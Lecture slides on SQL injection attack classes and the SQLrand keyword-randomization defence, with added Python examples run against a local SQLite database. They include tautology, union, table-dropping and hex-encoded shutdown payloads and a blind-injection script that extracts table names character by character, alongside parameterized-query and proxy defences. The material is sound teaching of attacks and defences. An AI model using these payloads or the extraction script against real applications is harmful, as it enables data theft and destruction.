SQL
Hamdi Yesilyurt, MA Student in MSDF & PhD, Public Affairs
Riji Jacob, MS Student in Computer Science


Slide 2
- Many Web applications on the Internet serve database-driven content (e.g., Yahoo, Amazon).
- The interactive nature of Web applications that use database services exposes them to SQL injection attacks.
- Web applications receive user input via form fields and then pass that input on as database requests.

Slide 3
- A transaction may contain a user name, a password, and information of large monetary value.
- It is also a national security and privacy matter, e.g., social security numbers in the U.S.
- SQL injection attacks are widespread, and many Web applications are vulnerable to SQL Injection Attacks (SQLIAs).
- A study by the Gartner Group of over 300 Internet Web sites showed that most of them could be vulnerable to SQLIAs.
- SQLIA examples: Travelocity, FTD.com, and Guess Inc.

Slide 4
- SQL injection is a code injection technique that exploits a vulnerability in the way an application builds the queries it sends to its database layer.
- Data provided by the user is NOT validated and is included in an SQL query in such a way that part of the user's input is treated as SQL code rather than as data.

Slide 5 (types of SQLIA)
- Tautologies
- Illegal/Logically Incorrect Queries
- Union Query
- Piggy-Backed Queries
- Stored Procedures
- Inference
- Alternate Encodings

Slide 6 (Tautologies)
- Attack intent: bypassing authentication, identifying injectable parameters, extracting data.
- The general goal of a tautology-based attack is to inject code into one or more conditional statements so that they always evaluate to true.
- An attacker exploits an injectable field that is used in a query's WHERE clause. Submitting ' or 1=1 -- as the login yields:

    SELECT accounts FROM users WHERE login='' or 1=1 -- AND pass='' AND pin=

  Everything after -- is a comment, so the password and PIN conditions are never evaluated and every row of users matches.

Slide 7 (Illegal/Logically Incorrect Queries)
- Attack intent: identifying injectable parameters, performing database finger-printing, extracting data.
- Description: this attack lets an attacker gather important information about the type and structure of the back-end database of a Web application by provoking an error whose message leaks that information.

    SELECT accounts FROM users WHERE login='' AND pass='' AND pin= convert(int,(select top 1 name from sysobjects where xtype='u'))

  The convert() fails because a table name is not an integer, and SQL Server's error message echoes the value it could not convert: the name of the first user table.

Slide 8 (Union Query)
- Attack intent: bypassing authentication, extracting data.
- Description: in union-query attacks, an attacker exploits a vulnerable parameter to change the data set returned for a given query, typically by appending a UNION SELECT over a table of interest.

    SELECT accounts FROM users WHERE login='' UNION SELECT cardNo from CreditCards where acctNo=10032 -- AND pass='' AND pin=

  The first SELECT returns nothing (no user has an empty login), so the application receives, and often displays, the card number instead of an account.

Slide 9 (Piggy-Backed Queries)
- Attack intent: extracting data, adding or modifying data, performing denial of service, executing remote commands.
- Description: in this attack type, an attacker tries to inject additional queries into the original query. Vulnerability to this type of attack often depends on a database configuration, or a database driver, that allows multiple statements to be contained in a single string.

    SELECT accounts FROM users WHERE login='doe' AND pass=''; drop table users -- ' AND pin=123
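The tautology, union and piggy-backed injections from slides 6, 8 and 9, run against a small in-memory SQLite database, as an added example that is not part of the original slides or of the paper they summarize. The table contents, the vulnerable_login/safe_login helper names and the choice of SQLite are assumptions of this example (the slides' queries target SQL Server); SQLite is convenient here because Python's sqlite3 module refuses a second statement in execute() but runs it in executescript(), which is exactly the "configuration that allows multiple statements" the slide refers to.

```python
import sqlite3


def make_db():
    """Constructed sample data; nothing here comes from the slides."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (login TEXT, pass TEXT, pin INTEGER, accounts TEXT);
        INSERT INTO users VALUES ('doe',   's3cret',  123, 'ACCT-1001');
        INSERT INTO users VALUES ('alice', 'hunter2', 456, 'ACCT-2002');
        CREATE TABLE CreditCards (acctNo INTEGER, cardNo TEXT);
        INSERT INTO CreditCards VALUES (10032, '4111-1111-1111-1111');
    """)
    return conn


def vulnerable_login(conn, login, pw, pin):
    """The slides' query, built by string concatenation: user input becomes SQL."""
    sql = (f"SELECT accounts FROM users WHERE login='{login}' "
           f"AND pass='{pw}' AND pin={pin}")
    return sorted(row[0] for row in conn.execute(sql))


def safe_login(conn, login, pw, pin):
    """Hardened form: placeholders keep the input as data, never as SQL code."""
    sql = "SELECT accounts FROM users WHERE login=? AND pass=? AND pin=?"
    return sorted(row[0] for row in conn.execute(sql, (login, pw, pin)))


def table_exists(conn, name):
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                       (name,)).fetchone()
    return row is not None


def attack_results():
    """Run the slides' attack strings through both query builders."""
    conn = make_db()
    tautology = "' or 1=1 --"                                              # slide 6
    union = "' UNION SELECT cardNo FROM CreditCards WHERE acctNo=10032 --"  # slide 8
    results = {
        "tautology_vuln": vulnerable_login(conn, tautology, "", 0),
        "tautology_safe": safe_login(conn, tautology, "", 0),
        "union_vuln": vulnerable_login(conn, union, "", 0),
        "union_safe": safe_login(conn, union, "", 0),
    }
    # Piggy-backed query (slide 9). sqlite3's execute() accepts one statement
    # per call, so the injected DROP is rejected by the driver ...
    try:
        vulnerable_login(conn, "doe", "'; DROP TABLE users --", 123)
        results["piggyback_single_statement"] = "executed"
    except (sqlite3.Error, sqlite3.Warning):
        results["piggyback_single_statement"] = "rejected"
    # ... but the same string destroys the table where the driver or the
    # database configuration allows several statements in one call.
    conn.executescript("SELECT accounts FROM users WHERE login='doe' AND pass=''; "
                       "DROP TABLE users --' AND pin=123")
    results["users_table_after_piggyback"] = table_exists(conn, "users")
    return results


if __name__ == "__main__":
    for name, value in attack_results().items():
        print(f"{name}: {value}")
```

With the concatenated query the tautology returns every account and the union returns the card number; with placeholders both return nothing, because the whole injected string is compared against the login column as one value.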

Slide 10 (Stored Procedures)
- Attack intent: performing privilege escalation, performing denial of service, executing remote commands.
- Description: SQLIAs of this type try to execute stored procedures, either the database's built-in ones or application procedures that themselves assemble dynamic SQL by concatenation. An attacker first determines which back-end database is in use, because the available procedures depend on it.
- Example of a vulnerable stored procedure. The original slide wrote it in a mix of Oracle (varchar2) and T-SQL syntax and referred to @pass as @password; it is given here as valid T-SQL with the same behaviour:

    CREATE PROCEDURE DBO.isAuthenticated
      @userName varchar(50), @pass varchar(50), @pin int
    AS
      EXEC('SELECT accounts FROM users WHERE login=''' + @userName +
           ''' and pass=''' + @pass + ''' and pin=' + CAST(@pin AS varchar(10)));
    GO

  Concatenating the parameters into the string passed to EXEC reproduces every injection seen so far inside the procedure; the fix is to execute the statement with sp_executesql and hand @userName, @pass and @pin over as parameters instead of splicing them into the text.

Slide 11 (Inference)
- Attack intent: identifying injectable parameters, extracting data, determining database schema.
- Description: the query is modified to recast it in the form of an action that is executed depending on the answer to a true/false question about data values in the database.
- Attackers generally use this against a site that has been secured enough that, when an injection succeeds, there is no usable feedback via database error messages; the answer is read instead from the application's behaviour (blind injection) or from its response time (timing attack).

    SELECT accounts FROM users WHERE login='legalUser' and ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X WAITFOR 5 -- ' AND pass='' AND pin=0

  If the first character of the first object name has an ASCII code above X, the database pauses before answering (the slide's WAITFOR 5 is shorthand; on SQL Server the pause is written WAITFOR DELAY '0:0:5'). Repeating the probe with different values of X and different character positions extracts the name one character at a time.
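The character-by-character extraction that slide 11 describes, carried through as an added example (not code from the slides or the paper). It assumes a SQLite database where sqlite_master plays the role of sysobjects and unicode()/substr() replace ASCII()/SUBSTRING(); the yes/no answer is read from whether the login query returns a row rather than from a WAITFOR delay, which SQLite does not have. The login_succeeds and extract_first_table_name helper names and the single-table schema are constructed for this example. It also goes one step beyond the slide: instead of testing one value of X at a time, each character is found by binary search on the "> X" question, seven probes per character.

```python
import sqlite3


def make_db():
    """Constructed sample schema; the one table name is what the attacker recovers."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (login TEXT, pass TEXT, pin INTEGER, accounts TEXT);
        INSERT INTO users VALUES ('legalUser', 'pw', 0, 'ACCT-1');
    """)
    return conn


def login_succeeds(conn, login):
    """The only observable the site exposes: did the login query return a row?
    Database errors are swallowed, as on a site that hides error messages."""
    sql = (f"SELECT accounts FROM users WHERE login='{login}' "
           f"AND pass='' AND pin=0")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def extract_first_table_name(conn, max_len=32):
    """Recover the first table name one character at a time from yes/no answers."""
    name = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        # Binary search on the slide's condition "code of character pos > X":
        # a row comes back exactly when the condition is true.
        while lo < hi:
            mid = (lo + hi) // 2
            payload = ("legalUser' AND unicode(substr((SELECT name FROM sqlite_master "
                       f"WHERE type='table' LIMIT 1),{pos},1)) > {mid} --")
            if login_succeeds(conn, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # past the end of the name: substr() is '' and unicode('') is NULL
        name += chr(lo)
    return name


if __name__ == "__main__":
    print(extract_first_table_name(make_db()))
```

The trailing -- comments out the password and PIN checks, so the only thing that decides whether a row comes back is the injected comparison. Note that the site never returns an error or the data itself; the whole name leaks through a one-bit channel.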

Slide 12 (Alternate Encodings)
- Attack intent: evading detection.
- Description: in this attack, the injected text is modified so as to avoid detection by defensive coding practices and also by many automated prevention techniques; it is used in conjunction with the other attack types.

    SELECT accounts FROM users WHERE login='legalUser'; exec(char(0x73687574646f776e)) -- AND pass='' AND pin=

  The hex string 0x73687574646f776e is the ASCII text "shutdown", so a filter that looks for the literal word never sees it, while the database decodes and executes it.

Slide 13
- Apply instruction-set randomization to SQL.
- Create instances of the language that are unpredictable to the attacker.
- Queries injected by the attacker will be caught by the database parser.
- An intermediary proxy translates the randomized SQL back to the standard language.
- The mechanism imposes negligible performance overhead on query processing and can easily be retrofitted to existing systems.


Slide 15
- The mechanism provides a tool that reads one or more SQL statements and rewrites every keyword with the random key appended. For the query

    select gender, avg(age) from cs101.students where dept = %d group by gender

  the utility identifies the six keywords and appends the key to each one (e.g., when the key is "123"):

    select123 gender, avg123 (age) from123 cs101.students where123 dept = %d group123 by123 gender

Slide 16
- A proxy server sits between the client (the Web server) and the SQL server, de-randomizes the requests received from the client, and conveys the query to the server.
- If an SQL injection attack has occurred, the injected keywords carry no key, so the proxy's parser will fail to recognize the randomized query and will reject it.
- The implementation focused on CGI scripts as the query generators; a similar approach applies when queries are generated with JDBC.
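The randomization tool and the de-randomizing proxy of slides 13 to 16, which are the SQLrand scheme of Boyd and Keromytis, as an added example that is not the SQLrand code itself. It assumes a constructed subset of SQL keywords (the real tool keys every keyword of the grammar), a simplified tokenizer that only recognizes single-quoted string literals and words (no comment handling), a random key drawn at deployment time, and a "CGI script" that drops the raw user value into the %d of the slide's template without checking it is a number. The same block also covers slide 12: the encoded payload still has to start with a bare exec, and a keyword without the key is rejected before the argument is ever looked at.

```python
import re
import secrets

# Constructed subset of SQL keywords; the real tool keys every keyword of the grammar.
KEYWORDS = {
    "select", "from", "where", "group", "by", "avg", "and", "or", "union",
    "exec", "drop", "table", "insert", "into", "values", "shutdown", "char",
}

# Tokens: a single-quoted string literal, a word, any other single character,
# or a run of whitespace. Every character lands in exactly one token, so joining
# the tokens reproduces the input unchanged.
TOKEN_RE = re.compile(r"'(?:[^']|'')*'|[A-Za-z_][A-Za-z0-9_]*|\S|\s+")


def make_key():
    """A fresh random key per deployment (the slide uses '123' for illustration)."""
    return str(secrets.randbelow(10**9))


def randomize(sql, key):
    """Build-time tool: append the key to every keyword outside string literals."""
    out = []
    for tok in TOKEN_RE.findall(sql):
        if tok.lower() in KEYWORDS:
            tok += key
        out.append(tok)
    return "".join(out)


def derandomize(sql, key):
    """Proxy: strip the key from keyed keywords and forward standard SQL.
    A keyword without the key can only have come from injected input, so the
    query is rejected instead of being forwarded to the database."""
    out = []
    for tok in TOKEN_RE.findall(sql):
        if tok.lower() in KEYWORDS:
            raise ValueError(f"unkeyed keyword {tok!r}: injected SQL")
        stem = tok[:-len(key)]
        if tok.endswith(key) and stem.lower() in KEYWORDS:
            tok = stem
        out.append(tok)
    return "".join(out)


# The slide's query template; the CGI script fills in %d at run time.
TEMPLATE = "select gender, avg(age) from cs101.students where dept = %d group by gender"


def proxy_outcome(dept_input, key):
    """Application (randomized template + raw user data) -> proxy -> database."""
    query = randomize(TEMPLATE, key).replace("%d", dept_input)
    try:
        return "accepted", derandomize(query, key)
    except ValueError as err:
        return "rejected", str(err)


if __name__ == "__main__":
    key = make_key()
    print(randomize(TEMPLATE, "123"))
    print(proxy_outcome("42", key))
    print(proxy_outcome("0 or 1=1", key))                              # slide 6 style
    print(proxy_outcome("0; exec(char(0x73687574646f776e)) --", key))  # slide 12
```

The security of the scheme rests on the key staying secret from anyone who can supply input: the proxy distinguishes the application's keywords from injected ones purely by the suffix, so the randomized template must never be echoed to users in error pages.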
